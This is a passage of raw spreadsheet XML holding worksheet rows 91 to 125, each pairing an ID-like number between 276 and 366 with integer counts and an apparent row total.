        <v>91</v>
      </c>
      <c r="K91" s="7">
        <v>276</v>
      </c>
      <c r="L91" s="8">
        <v>22</v>
      </c>
      <c r="M91" s="8">
        <v>1</v>
      </c>
      <c r="N91" s="8">
        <v>0</v>
      </c>
      <c r="O91" s="8">
        <v>1</v>
      </c>
      <c r="P91" s="8">
        <v>36</v>
      </c>
      <c r="Q91" s="8">
        <v>31</v>
      </c>
    </row>
    <row r="92" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A92" s="7">
        <v>280</v>
      </c>
      <c r="B92" s="8">
        <v>25</v>
      </c>
      <c r="C92" s="8">
        <v>1</v>
      </c>
      <c r="D92" s="8">
        <v>57</v>
      </c>
      <c r="E92" s="8">
        <v>91</v>
      </c>
      <c r="F92" s="8">
        <v>65</v>
      </c>
      <c r="G92" s="8">
        <v>13</v>
      </c>
      <c r="H92" s="8">
        <v>252</v>
      </c>
      <c r="K92" s="7">
        <v>280</v>
      </c>
      <c r="L92" s="8">
        <v>25</v>
      </c>
      <c r="M92" s="8">
        <v>1</v>
      </c>
      <c r="N92" s="8">
        <v>57</v>
      </c>
      <c r="O92" s="8">
        <v>91</v>
      </c>
      <c r="P92" s="8">
        <v>65</v>
      </c>
      <c r="Q92" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="93" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A93" s="7">
        <v>285</v>
      </c>
      <c r="B93" s="8">
        <v>22</v>
      </c>
      <c r="C93" s="8">
        <v>1</v>
      </c>
      <c r="D93" s="8">
        <v>35</v>
      </c>
      <c r="E93" s="8">
        <v>110</v>
      </c>
      <c r="F93" s="8">
        <v>29</v>
      </c>
      <c r="G93" s="8">
        <v>36</v>
      </c>
      <c r="H93" s="8">
        <v>233</v>
      </c>
      <c r="K93" s="7">
        <v>285</v>
      </c>
      <c r="L93" s="8">
        <v>22</v>
      </c>
      <c r="M93" s="8">
        <v>1</v>
      </c>
      <c r="N93" s="8">
        <v>35</v>
      </c>
      <c r="O93" s="8">
        <v>110</v>
      </c>
      <c r="P93" s="8">
        <v>29</v>
      </c>
      <c r="Q93" s="8">
        <v>36</v>
      </c>
    </row>
    <row r="94" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A94" s="7">
        <v>286</v>
      </c>
      <c r="B94" s="8">
        <v>30</v>
      </c>
      <c r="C94" s="8">
        <v>3</v>
      </c>
      <c r="D94" s="8">
        <v>110</v>
      </c>
      <c r="E94" s="8">
        <v>177</v>
      </c>
      <c r="F94" s="8">
        <v>20</v>
      </c>
      <c r="G94" s="8">
        <v>5</v>
      </c>
      <c r="H94" s="8">
        <v>345</v>
      </c>
      <c r="K94" s="7">
        <v>286</v>
      </c>
      <c r="L94" s="8">
        <v>30</v>
      </c>
      <c r="M94" s="8">
        <v>3</v>
      </c>
      <c r="N94" s="8">
        <v>110</v>
      </c>
      <c r="O94" s="8">
        <v>177</v>
      </c>
      <c r="P94" s="8">
        <v>20</v>
      </c>
      <c r="Q94" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="95" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A95" s="7">
        <v>290</v>
      </c>
      <c r="B95" s="8">
        <v>0</v>
      </c>
      <c r="C95" s="8">
        <v>0</v>
      </c>
      <c r="D95" s="8">
        <v>0</v>
      </c>
      <c r="E95" s="8">
        <v>0</v>
      </c>
      <c r="F95" s="8">
        <v>8</v>
      </c>
      <c r="G95" s="8">
        <v>3</v>
      </c>
      <c r="H95" s="8">
        <v>11</v>
      </c>
      <c r="K95" s="7">
        <v>290</v>
      </c>
      <c r="L95" s="8">
        <v>0</v>
      </c>
      <c r="M95" s="8">
        <v>0</v>
      </c>
      <c r="N95" s="8">
        <v>0</v>
      </c>
      <c r="O95" s="8">
        <v>0</v>
      </c>
      <c r="P95" s="8">
        <v>8</v>
      </c>
      <c r="Q95" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="96" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A96" s="7">
        <v>292</v>
      </c>
      <c r="B96" s="8">
        <v>7</v>
      </c>
      <c r="C96" s="8">
        <v>1</v>
      </c>
      <c r="D96" s="8">
        <v>5</v>
      </c>
      <c r="E96" s="8">
        <v>0</v>
      </c>
      <c r="F96" s="8">
        <v>7</v>
      </c>
      <c r="G96" s="8">
        <v>2</v>
      </c>
      <c r="H96" s="8">
        <v>22</v>
      </c>
      <c r="K96" s="7">
        <v>292</v>
      </c>
      <c r="L96" s="8">
        <v>7</v>
      </c>
      <c r="M96" s="8">
        <v>1</v>
      </c>
      <c r="N96" s="8">
        <v>5</v>
      </c>
      <c r="O96" s="8">
        <v>0</v>
      </c>
      <c r="P96" s="8">
        <v>7</v>
      </c>
      <c r="Q96" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="97" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A97" s="7">
        <v>295</v>
      </c>
      <c r="B97" s="8">
        <v>25</v>
      </c>
      <c r="C97" s="8">
        <v>1</v>
      </c>
      <c r="D97" s="8">
        <v>0</v>
      </c>
      <c r="E97" s="8">
        <v>0</v>
      </c>
      <c r="F97" s="8">
        <v>68</v>
      </c>
      <c r="G97" s="8">
        <v>23</v>
      </c>
      <c r="H97" s="8">
        <v>117</v>
      </c>
      <c r="K97" s="7">
        <v>295</v>
      </c>
      <c r="L97" s="8">
        <v>25</v>
      </c>
      <c r="M97" s="8">
        <v>1</v>
      </c>
      <c r="N97" s="8">
        <v>0</v>
      </c>
      <c r="O97" s="8">
        <v>0</v>
      </c>
      <c r="P97" s="8">
        <v>68</v>
      </c>
      <c r="Q97" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="98" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A98" s="7">
        <v>296</v>
      </c>
      <c r="B98" s="8">
        <v>25</v>
      </c>
      <c r="C98" s="8">
        <v>2</v>
      </c>
      <c r="D98" s="8">
        <v>153</v>
      </c>
      <c r="E98" s="8">
        <v>114</v>
      </c>
      <c r="F98" s="8">
        <v>6</v>
      </c>
      <c r="G98" s="8">
        <v>1</v>
      </c>
      <c r="H98" s="8">
        <v>301</v>
      </c>
      <c r="K98" s="7">
        <v>296</v>
      </c>
      <c r="L98" s="8">
        <v>25</v>
      </c>
      <c r="M98" s="8">
        <v>2</v>
      </c>
      <c r="N98" s="8">
        <v>153</v>
      </c>
      <c r="O98" s="8">
        <v>114</v>
      </c>
      <c r="P98" s="8">
        <v>6</v>
      </c>
      <c r="Q98" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="99" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A99" s="7">
        <v>297</v>
      </c>
      <c r="B99" s="8">
        <v>26</v>
      </c>
      <c r="C99" s="8">
        <v>0</v>
      </c>
      <c r="D99" s="8">
        <v>25</v>
      </c>
      <c r="E99" s="8">
        <v>26</v>
      </c>
      <c r="F99" s="8">
        <v>7</v>
      </c>
      <c r="G99" s="8">
        <v>4</v>
      </c>
      <c r="H99" s="8">
        <v>88</v>
      </c>
      <c r="K99" s="7">
        <v>297</v>
      </c>
      <c r="L99" s="8">
        <v>26</v>
      </c>
      <c r="M99" s="8">
        <v>0</v>
      </c>
      <c r="N99" s="8">
        <v>25</v>
      </c>
      <c r="O99" s="8">
        <v>26</v>
      </c>
      <c r="P99" s="8">
        <v>7</v>
      </c>
      <c r="Q99" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="100" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A100" s="7">
        <v>300</v>
      </c>
      <c r="B100" s="8">
        <v>25</v>
      </c>
      <c r="C100" s="8">
        <v>0</v>
      </c>
      <c r="D100" s="8">
        <v>0</v>
      </c>
      <c r="E100" s="8">
        <v>0</v>
      </c>
      <c r="F100" s="8">
        <v>2</v>
      </c>
      <c r="G100" s="8">
        <v>1</v>
      </c>
      <c r="H100" s="8">
        <v>28</v>
      </c>
      <c r="K100" s="7">
        <v>300</v>
      </c>
      <c r="L100" s="8">
        <v>25</v>
      </c>
      <c r="M100" s="8">
        <v>0</v>
      </c>
      <c r="N100" s="8">
        <v>0</v>
      </c>
      <c r="O100" s="8">
        <v>0</v>
      </c>
      <c r="P100" s="8">
        <v>2</v>
      </c>
      <c r="Q100" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="101" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A101" s="7">
        <v>302</v>
      </c>
      <c r="B101" s="8">
        <v>26</v>
      </c>
      <c r="C101" s="8">
        <v>0</v>
      </c>
      <c r="D101" s="8">
        <v>5</v>
      </c>
      <c r="E101" s="8">
        <v>20</v>
      </c>
      <c r="F101" s="8">
        <v>42</v>
      </c>
      <c r="G101" s="8">
        <v>10</v>
      </c>
      <c r="H101" s="8">
        <v>103</v>
      </c>
      <c r="K101" s="7">
        <v>302</v>
      </c>
      <c r="L101" s="8">
        <v>26</v>
      </c>
      <c r="M101" s="8">
        <v>0</v>
      </c>
      <c r="N101" s="8">
        <v>5</v>
      </c>
      <c r="O101" s="8">
        <v>20</v>
      </c>
      <c r="P101" s="8">
        <v>42</v>
      </c>
      <c r="Q101" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="102" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A102" s="7">
        <v>305</v>
      </c>
      <c r="B102" s="8">
        <v>26</v>
      </c>
      <c r="C102" s="8">
        <v>0</v>
      </c>
      <c r="D102" s="8">
        <v>10</v>
      </c>
      <c r="E102" s="8">
        <v>0</v>
      </c>
      <c r="F102" s="8">
        <v>8</v>
      </c>
      <c r="G102" s="8">
        <v>5</v>
      </c>
      <c r="H102" s="8">
        <v>49</v>
      </c>
      <c r="K102" s="7">
        <v>305</v>
      </c>
      <c r="L102" s="8">
        <v>26</v>
      </c>
      <c r="M102" s="8">
        <v>0</v>
      </c>
      <c r="N102" s="8">
        <v>10</v>
      </c>
      <c r="O102" s="8">
        <v>0</v>
      </c>
      <c r="P102" s="8">
        <v>8</v>
      </c>
      <c r="Q102" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="103" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A103" s="7">
        <v>306</v>
      </c>
      <c r="B103" s="8">
        <v>25</v>
      </c>
      <c r="C103" s="8">
        <v>0</v>
      </c>
      <c r="D103" s="8">
        <v>30</v>
      </c>
      <c r="E103" s="8">
        <v>290</v>
      </c>
      <c r="F103" s="8">
        <v>63</v>
      </c>
      <c r="G103" s="8">
        <v>124</v>
      </c>
      <c r="H103" s="8">
        <v>532</v>
      </c>
      <c r="K103" s="7">
        <v>306</v>
      </c>
      <c r="L103" s="8">
        <v>25</v>
      </c>
      <c r="M103" s="8">
        <v>0</v>
      </c>
      <c r="N103" s="8">
        <v>30</v>
      </c>
      <c r="O103" s="8">
        <v>290</v>
      </c>
      <c r="P103" s="8">
        <v>63</v>
      </c>
      <c r="Q103" s="8">
        <v>124</v>
      </c>
    </row>
    <row r="104" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A104" s="7">
        <v>316</v>
      </c>
      <c r="B104" s="8">
        <v>30</v>
      </c>
      <c r="C104" s="8">
        <v>2</v>
      </c>
      <c r="D104" s="8">
        <v>5</v>
      </c>
      <c r="E104" s="8">
        <v>0</v>
      </c>
      <c r="F104" s="8">
        <v>16</v>
      </c>
      <c r="G104" s="8">
        <v>8</v>
      </c>
      <c r="H104" s="8">
        <v>61</v>
      </c>
      <c r="K104" s="7">
        <v>316</v>
      </c>
      <c r="L104" s="8">
        <v>30</v>
      </c>
      <c r="M104" s="8">
        <v>2</v>
      </c>
      <c r="N104" s="8">
        <v>5</v>
      </c>
      <c r="O104" s="8">
        <v>0</v>
      </c>
      <c r="P104" s="8">
        <v>16</v>
      </c>
      <c r="Q104" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="105" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A105" s="7">
        <v>318</v>
      </c>
      <c r="B105" s="8">
        <v>25</v>
      </c>
      <c r="C105" s="8">
        <v>0</v>
      </c>
      <c r="D105" s="8">
        <v>64</v>
      </c>
      <c r="E105" s="8">
        <v>3</v>
      </c>
      <c r="F105" s="8">
        <v>13</v>
      </c>
      <c r="G105" s="8">
        <v>4</v>
      </c>
      <c r="H105" s="8">
        <v>109</v>
      </c>
      <c r="K105" s="7">
        <v>318</v>
      </c>
      <c r="L105" s="8">
        <v>25</v>
      </c>
      <c r="M105" s="8">
        <v>0</v>
      </c>
      <c r="N105" s="8">
        <v>64</v>
      </c>
      <c r="O105" s="8">
        <v>3</v>
      </c>
      <c r="P105" s="8">
        <v>13</v>
      </c>
      <c r="Q105" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="106" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A106" s="7">
        <v>321</v>
      </c>
      <c r="B106" s="8">
        <v>25</v>
      </c>
      <c r="C106" s="8">
        <v>1</v>
      </c>
      <c r="D106" s="8">
        <v>34</v>
      </c>
      <c r="E106" s="8">
        <v>20</v>
      </c>
      <c r="F106" s="8">
        <v>13</v>
      </c>
      <c r="G106" s="8">
        <v>1</v>
      </c>
      <c r="H106" s="8">
        <v>94</v>
      </c>
      <c r="K106" s="7">
        <v>321</v>
      </c>
      <c r="L106" s="8">
        <v>25</v>
      </c>
      <c r="M106" s="8">
        <v>1</v>
      </c>
      <c r="N106" s="8">
        <v>34</v>
      </c>
      <c r="O106" s="8">
        <v>20</v>
      </c>
      <c r="P106" s="8">
        <v>13</v>
      </c>
      <c r="Q106" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="107" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A107" s="7">
        <v>324</v>
      </c>
      <c r="B107" s="8">
        <v>27</v>
      </c>
      <c r="C107" s="8">
        <v>0</v>
      </c>
      <c r="D107" s="8">
        <v>0</v>
      </c>
      <c r="E107" s="8">
        <v>0</v>
      </c>
      <c r="F107" s="8">
        <v>10</v>
      </c>
      <c r="G107" s="8">
        <v>3</v>
      </c>
      <c r="H107" s="8">
        <v>40</v>
      </c>
      <c r="K107" s="7">
        <v>324</v>
      </c>
      <c r="L107" s="8">
        <v>27</v>
      </c>
      <c r="M107" s="8">
        <v>0</v>
      </c>
      <c r="N107" s="8">
        <v>0</v>
      </c>
      <c r="O107" s="8">
        <v>0</v>
      </c>
      <c r="P107" s="8">
        <v>10</v>
      </c>
      <c r="Q107" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="108" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A108" s="7">
        <v>325</v>
      </c>
      <c r="B108" s="8">
        <v>27</v>
      </c>
      <c r="C108" s="8">
        <v>0</v>
      </c>
      <c r="D108" s="8">
        <v>0</v>
      </c>
      <c r="E108" s="8">
        <v>0</v>
      </c>
      <c r="F108" s="8">
        <v>15</v>
      </c>
      <c r="G108" s="8">
        <v>4</v>
      </c>
      <c r="H108" s="8">
        <v>46</v>
      </c>
      <c r="K108" s="7">
        <v>325</v>
      </c>
      <c r="L108" s="8">
        <v>27</v>
      </c>
      <c r="M108" s="8">
        <v>0</v>
      </c>
      <c r="N108" s="8">
        <v>0</v>
      </c>
      <c r="O108" s="8">
        <v>0</v>
      </c>
      <c r="P108" s="8">
        <v>15</v>
      </c>
      <c r="Q108" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="109" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A109" s="7">
        <v>330</v>
      </c>
      <c r="B109" s="8">
        <v>26</v>
      </c>
      <c r="C109" s="8">
        <v>0</v>
      </c>
      <c r="D109" s="8">
        <v>0</v>
      </c>
      <c r="E109" s="8">
        <v>0</v>
      </c>
      <c r="F109" s="8">
        <v>12</v>
      </c>
      <c r="G109" s="8">
        <v>3</v>
      </c>
      <c r="H109" s="8">
        <v>41</v>
      </c>
      <c r="K109" s="7">
        <v>330</v>
      </c>
      <c r="L109" s="8">
        <v>26</v>
      </c>
      <c r="M109" s="8">
        <v>0</v>
      </c>
      <c r="N109" s="8">
        <v>0</v>
      </c>
      <c r="O109" s="8">
        <v>0</v>
      </c>
      <c r="P109" s="8">
        <v>12</v>
      </c>
      <c r="Q109" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="110" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A110" s="7">
        <v>331</v>
      </c>
      <c r="B110" s="8">
        <v>0</v>
      </c>
      <c r="C110" s="8">
        <v>0</v>
      </c>
      <c r="D110" s="8">
        <v>0</v>
      </c>
      <c r="E110" s="8">
        <v>0</v>
      </c>
      <c r="F110" s="8">
        <v>13</v>
      </c>
      <c r="G110" s="8">
        <v>5</v>
      </c>
      <c r="H110" s="8">
        <v>18</v>
      </c>
      <c r="K110" s="7">
        <v>331</v>
      </c>
      <c r="L110" s="8">
        <v>0</v>
      </c>
      <c r="M110" s="8">
        <v>0</v>
      </c>
      <c r="N110" s="8">
        <v>0</v>
      </c>
      <c r="O110" s="8">
        <v>0</v>
      </c>
      <c r="P110" s="8">
        <v>13</v>
      </c>
      <c r="Q110" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="111" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A111" s="7">
        <v>332</v>
      </c>
      <c r="B111" s="8">
        <v>25</v>
      </c>
      <c r="C111" s="8">
        <v>0</v>
      </c>
      <c r="D111" s="8">
        <v>160</v>
      </c>
      <c r="E111" s="8">
        <v>110</v>
      </c>
      <c r="F111" s="8">
        <v>67</v>
      </c>
      <c r="G111" s="8">
        <v>27</v>
      </c>
      <c r="H111" s="8">
        <v>389</v>
      </c>
      <c r="K111" s="7">
        <v>332</v>
      </c>
      <c r="L111" s="8">
        <v>25</v>
      </c>
      <c r="M111" s="8">
        <v>0</v>
      </c>
      <c r="N111" s="8">
        <v>160</v>
      </c>
      <c r="O111" s="8">
        <v>110</v>
      </c>
      <c r="P111" s="8">
        <v>67</v>
      </c>
      <c r="Q111" s="8">
        <v>27</v>
      </c>
    </row>
    <row r="112" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A112" s="7">
        <v>333</v>
      </c>
      <c r="B112" s="8">
        <v>7</v>
      </c>
      <c r="C112" s="8">
        <v>0</v>
      </c>
      <c r="D112" s="8">
        <v>5</v>
      </c>
      <c r="E112" s="8">
        <v>1</v>
      </c>
      <c r="F112" s="8">
        <v>3</v>
      </c>
      <c r="G112" s="8">
        <v>1</v>
      </c>
      <c r="H112" s="8">
        <v>17</v>
      </c>
      <c r="K112" s="7">
        <v>333</v>
      </c>
      <c r="L112" s="8">
        <v>7</v>
      </c>
      <c r="M112" s="8">
        <v>0</v>
      </c>
      <c r="N112" s="8">
        <v>5</v>
      </c>
      <c r="O112" s="8">
        <v>1</v>
      </c>
      <c r="P112" s="8">
        <v>3</v>
      </c>
      <c r="Q112" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="113" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A113" s="7">
        <v>337</v>
      </c>
      <c r="B113" s="8">
        <v>24</v>
      </c>
      <c r="C113" s="8">
        <v>1</v>
      </c>
      <c r="D113" s="8">
        <v>54</v>
      </c>
      <c r="E113" s="8">
        <v>70</v>
      </c>
      <c r="F113" s="8">
        <v>27</v>
      </c>
      <c r="G113" s="8">
        <v>8</v>
      </c>
      <c r="H113" s="8">
        <v>184</v>
      </c>
      <c r="K113" s="7">
        <v>337</v>
      </c>
      <c r="L113" s="8">
        <v>24</v>
      </c>
      <c r="M113" s="8">
        <v>1</v>
      </c>
      <c r="N113" s="8">
        <v>54</v>
      </c>
      <c r="O113" s="8">
        <v>70</v>
      </c>
      <c r="P113" s="8">
        <v>27</v>
      </c>
      <c r="Q113" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="114" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A114" s="7">
        <v>342</v>
      </c>
      <c r="B114" s="8">
        <v>12</v>
      </c>
      <c r="C114" s="8">
        <v>1</v>
      </c>
      <c r="D114" s="8">
        <v>3</v>
      </c>
      <c r="E114" s="8">
        <v>0</v>
      </c>
      <c r="F114" s="8">
        <v>2</v>
      </c>
      <c r="G114" s="8">
        <v>1</v>
      </c>
      <c r="H114" s="8">
        <v>19</v>
      </c>
      <c r="K114" s="7">
        <v>342</v>
      </c>
      <c r="L114" s="8">
        <v>12</v>
      </c>
      <c r="M114" s="8">
        <v>1</v>
      </c>
      <c r="N114" s="8">
        <v>3</v>
      </c>
      <c r="O114" s="8">
        <v>0</v>
      </c>
      <c r="P114" s="8">
        <v>2</v>
      </c>
      <c r="Q114" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="115" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A115" s="7">
        <v>343</v>
      </c>
      <c r="B115" s="8">
        <v>6</v>
      </c>
      <c r="C115" s="8">
        <v>2</v>
      </c>
      <c r="D115" s="8">
        <v>81</v>
      </c>
      <c r="E115" s="8">
        <v>68</v>
      </c>
      <c r="F115" s="8">
        <v>61</v>
      </c>
      <c r="G115" s="8">
        <v>80</v>
      </c>
      <c r="H115" s="8">
        <v>298</v>
      </c>
      <c r="K115" s="7">
        <v>343</v>
      </c>
      <c r="L115" s="8">
        <v>6</v>
      </c>
      <c r="M115" s="8">
        <v>2</v>
      </c>
      <c r="N115" s="8">
        <v>81</v>
      </c>
      <c r="O115" s="8">
        <v>68</v>
      </c>
      <c r="P115" s="8">
        <v>61</v>
      </c>
      <c r="Q115" s="8">
        <v>80</v>
      </c>
    </row>
    <row r="116" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A116" s="7">
        <v>346</v>
      </c>
      <c r="B116" s="8">
        <v>25</v>
      </c>
      <c r="C116" s="8">
        <v>2</v>
      </c>
      <c r="D116" s="8">
        <v>285</v>
      </c>
      <c r="E116" s="8">
        <v>367</v>
      </c>
      <c r="F116" s="8">
        <v>110</v>
      </c>
      <c r="G116" s="8">
        <v>32</v>
      </c>
      <c r="H116" s="8">
        <v>821</v>
      </c>
      <c r="K116" s="7">
        <v>346</v>
      </c>
      <c r="L116" s="8">
        <v>25</v>
      </c>
      <c r="M116" s="8">
        <v>2</v>
      </c>
      <c r="N116" s="8">
        <v>285</v>
      </c>
      <c r="O116" s="8">
        <v>367</v>
      </c>
      <c r="P116" s="8">
        <v>110</v>
      </c>
      <c r="Q116" s="8">
        <v>32</v>
      </c>
    </row>
    <row r="117" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A117" s="7">
        <v>350</v>
      </c>
      <c r="B117" s="8">
        <v>25</v>
      </c>
      <c r="C117" s="8">
        <v>1</v>
      </c>
      <c r="D117" s="8">
        <v>0</v>
      </c>
      <c r="E117" s="8">
        <v>0</v>
      </c>
      <c r="F117" s="8">
        <v>4</v>
      </c>
      <c r="G117" s="8">
        <v>14</v>
      </c>
      <c r="H117" s="8">
        <v>44</v>
      </c>
      <c r="K117" s="7">
        <v>350</v>
      </c>
      <c r="L117" s="8">
        <v>25</v>
      </c>
      <c r="M117" s="8">
        <v>1</v>
      </c>
      <c r="N117" s="8">
        <v>0</v>
      </c>
      <c r="O117" s="8">
        <v>0</v>
      </c>
      <c r="P117" s="8">
        <v>4</v>
      </c>
      <c r="Q117" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="118" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A118" s="7">
        <v>352</v>
      </c>
      <c r="B118" s="8">
        <v>0</v>
      </c>
      <c r="C118" s="8">
        <v>0</v>
      </c>
      <c r="D118" s="8">
        <v>0</v>
      </c>
      <c r="E118" s="8">
        <v>0</v>
      </c>
      <c r="F118" s="8">
        <v>12</v>
      </c>
      <c r="G118" s="8">
        <v>4</v>
      </c>
      <c r="H118" s="8">
        <v>16</v>
      </c>
      <c r="K118" s="7">
        <v>352</v>
      </c>
      <c r="L118" s="8">
        <v>0</v>
      </c>
      <c r="M118" s="8">
        <v>0</v>
      </c>
      <c r="N118" s="8">
        <v>0</v>
      </c>
      <c r="O118" s="8">
        <v>0</v>
      </c>
      <c r="P118" s="8">
        <v>12</v>
      </c>
      <c r="Q118" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="119" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A119" s="7">
        <v>358</v>
      </c>
      <c r="B119" s="8">
        <v>0</v>
      </c>
      <c r="C119" s="8">
        <v>0</v>
      </c>
      <c r="D119" s="8">
        <v>0</v>
      </c>
      <c r="E119" s="8">
        <v>0</v>
      </c>
      <c r="F119" s="8">
        <v>5</v>
      </c>
      <c r="G119" s="8">
        <v>0</v>
      </c>
      <c r="H119" s="8">
        <v>5</v>
      </c>
      <c r="K119" s="7">
        <v>358</v>
      </c>
      <c r="L119" s="8">
        <v>0</v>
      </c>
      <c r="M119" s="8">
        <v>0</v>
      </c>
      <c r="N119" s="8">
        <v>0</v>
      </c>
      <c r="O119" s="8">
        <v>0</v>
      </c>
      <c r="P119" s="8">
        <v>5</v>
      </c>
      <c r="Q119" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="120" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A120" s="7">
        <v>359</v>
      </c>
      <c r="B120" s="8">
        <v>27</v>
      </c>
      <c r="C120" s="8">
        <v>0</v>
      </c>
      <c r="D120" s="8">
        <v>0</v>
      </c>
      <c r="E120" s="8">
        <v>0</v>
      </c>
      <c r="F120" s="8">
        <v>2</v>
      </c>
      <c r="G120" s="8">
        <v>2</v>
      </c>
      <c r="H120" s="8">
        <v>31</v>
      </c>
      <c r="K120" s="7">
        <v>359</v>
      </c>
      <c r="L120" s="8">
        <v>27</v>
      </c>
      <c r="M120" s="8">
        <v>0</v>
      </c>
      <c r="N120" s="8">
        <v>0</v>
      </c>
      <c r="O120" s="8">
        <v>0</v>
      </c>
      <c r="P120" s="8">
        <v>2</v>
      </c>
      <c r="Q120" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="121" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A121" s="7">
        <v>360</v>
      </c>
      <c r="B121" s="8">
        <v>26</v>
      </c>
      <c r="C121" s="8">
        <v>0</v>
      </c>
      <c r="D121" s="8">
        <v>35</v>
      </c>
      <c r="E121" s="8">
        <v>5</v>
      </c>
      <c r="F121" s="8">
        <v>9</v>
      </c>
      <c r="G121" s="8">
        <v>14</v>
      </c>
      <c r="H121" s="8">
        <v>89</v>
      </c>
      <c r="K121" s="7">
        <v>360</v>
      </c>
      <c r="L121" s="8">
        <v>26</v>
      </c>
      <c r="M121" s="8">
        <v>0</v>
      </c>
      <c r="N121" s="8">
        <v>35</v>
      </c>
      <c r="O121" s="8">
        <v>5</v>
      </c>
      <c r="P121" s="8">
        <v>9</v>
      </c>
      <c r="Q121" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="122" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A122" s="7">
        <v>361</v>
      </c>
      <c r="B122" s="8">
        <v>27</v>
      </c>
      <c r="C122" s="8">
        <v>0</v>
      </c>
      <c r="D122" s="8">
        <v>0</v>
      </c>
      <c r="E122" s="8">
        <v>0</v>
      </c>
      <c r="F122" s="8">
        <v>2</v>
      </c>
      <c r="G122" s="8">
        <v>2</v>
      </c>
      <c r="H122" s="8">
        <v>31</v>
      </c>
      <c r="K122" s="7">
        <v>361</v>
      </c>
      <c r="L122" s="8">
        <v>27</v>
      </c>
      <c r="M122" s="8">
        <v>0</v>
      </c>
      <c r="N122" s="8">
        <v>0</v>
      </c>
      <c r="O122" s="8">
        <v>0</v>
      </c>
      <c r="P122" s="8">
        <v>2</v>
      </c>
      <c r="Q122" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="123" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A123" s="7">
        <v>364</v>
      </c>
      <c r="B123" s="8">
        <v>20</v>
      </c>
      <c r="C123" s="8">
        <v>1</v>
      </c>
      <c r="D123" s="8">
        <v>10</v>
      </c>
      <c r="E123" s="8">
        <v>20</v>
      </c>
      <c r="F123" s="8">
        <v>6</v>
      </c>
      <c r="G123" s="8">
        <v>4</v>
      </c>
      <c r="H123" s="8">
        <v>61</v>
      </c>
      <c r="K123" s="7">
        <v>364</v>
      </c>
      <c r="L123" s="8">
        <v>20</v>
      </c>
      <c r="M123" s="8">
        <v>1</v>
      </c>
      <c r="N123" s="8">
        <v>10</v>
      </c>
      <c r="O123" s="8">
        <v>20</v>
      </c>
      <c r="P123" s="8">
        <v>6</v>
      </c>
      <c r="Q123" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="124" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A124" s="7">
        <v>365</v>
      </c>
      <c r="B124" s="8">
        <v>25</v>
      </c>
      <c r="C124" s="8">
        <v>0</v>
      </c>
      <c r="D124" s="8">
        <v>27</v>
      </c>
      <c r="E124" s="8">
        <v>67</v>
      </c>
      <c r="F124" s="8">
        <v>21</v>
      </c>
      <c r="G124" s="8">
        <v>6</v>
      </c>
      <c r="H124" s="8">
        <v>146</v>
      </c>
      <c r="K124" s="7">
        <v>365</v>
      </c>
      <c r="L124" s="8">
        <v>25</v>
      </c>
      <c r="M124" s="8">
        <v>0</v>
      </c>
      <c r="N124" s="8">
        <v>27</v>
      </c>
      <c r="O124" s="8">
        <v>67</v>
      </c>
      <c r="P124" s="8">
        <v>21</v>
      </c>
      <c r="Q124" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="125" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A125" s="7">
        <v>366</v>
      </c>
      <c r="B125" s="8">
        <v>24</v>
      </c>
      <c r="C125" s="8">
        <v>1</v>
      </c>
      <c r="D125" s="8">
        <v>9</v>
      </c>
      <c r="E125" s="8">
        <v>14</v>
      </c>
      <c r="F125" s="8">
        <v>23</v>
      </c>
      <c r="G125" s="8">
        <v>73</v>
      </c>
      <c r="H125" s="8">
